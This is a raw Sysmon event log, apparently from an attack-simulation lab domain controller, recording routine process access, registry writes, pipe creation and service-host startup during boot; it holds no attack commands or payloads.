09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844944C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0800-00000000FD01}496C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052573Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844944C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052572Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844944C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052571Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844944C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0500-00000000FD01}416C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052570Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844944C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0700-00000000FD01}488C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052569Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844944C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0700-00000000FD01}488C:\Windows\system32\wininit.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052568Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.139{5EBD8912-8CA0-6151-0200-00000000FD01}324332C:\Windows\System32\smss.exe{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\system32\svchost.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6cc4|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 13241300x80000000000000001052567Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.076{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x80000000000000001052566Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.076{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x80000000000000001052565Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.076{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 10341000x80000000000000001052564Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.029{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0700-00000000FD01}488C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24cca|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052563Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.029{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0700-00000000FD01}488C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001052562Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.029{5EBD8912-8CBD-6151-0700-00000000FD01}488\Winsock2\CatalogChangeListener-1e8-0C:\Windows\system32\wininit.exe 17141700x80000000000000001052561Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.029{5EBD8912-8CBF-6151-0D00-00000000FD01}900\epmapperC:\Windows\system32\svchost.exe 10341000x80000000000000001052560Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.029{5EBD8912-8CBF-6151-0C00-00000000FD01}844872C:\Windows\system32\svchost.exe{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+480e8|c:\windows\system32\rpcss.dll+3c003|c:\windows\system32\rpcss.dll+3bf6e|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001052559Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.014{5EBD8912-8CBF-6151-0D00-00000000FD01}900\Winsock2\CatalogChangeListener-384-0C:\Windows\system32\svchost.exe 10341000x80000000000000001052558Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.014{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052557Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.014{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052556Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.014{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052555Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.998{5EBD8912-8CBD-6151-0A00-00000000FD01}624708C:\Windows\system32\services.exe{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052554Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.998{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052553Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.998{5EBD8912-8CBD-6151-0A00-00000000FD01}624628C:\Windows\system32\services.exe{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+1a423|C:\Windows\system32\services.exe+20187|C:\Windows\system32\services.exe+21f27|C:\Windows\system32\services.exe+2486c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052552Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.951{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052551Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.920{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052550Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.920{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052549Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.904{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052548Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.701{5EBD8912-8CBD-6151-0A00-00000000FD01}624708C:\Windows\system32\services.exe{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052547Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.685{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052546Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.685{5EBD8912-8CBD-6151-0A00-00000000FD01}624628C:\Windows\system32\services.exe{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+1a698|C:\Windows\system32\services.exe+1a391|C:\Windows\system32\services.exe+20187|C:\Windows\system32\services.exe+21f27|C:\Windows\system32\services.exe+2486c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052545Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.697{5EBD8912-8CBF-6151-0C00-00000000FD01}844C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001052544Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:59.685{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052543Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:59.217{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database EpochDWORD (0x0000144b) 10341000x80000000000000001052542Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:58.124{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052541Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 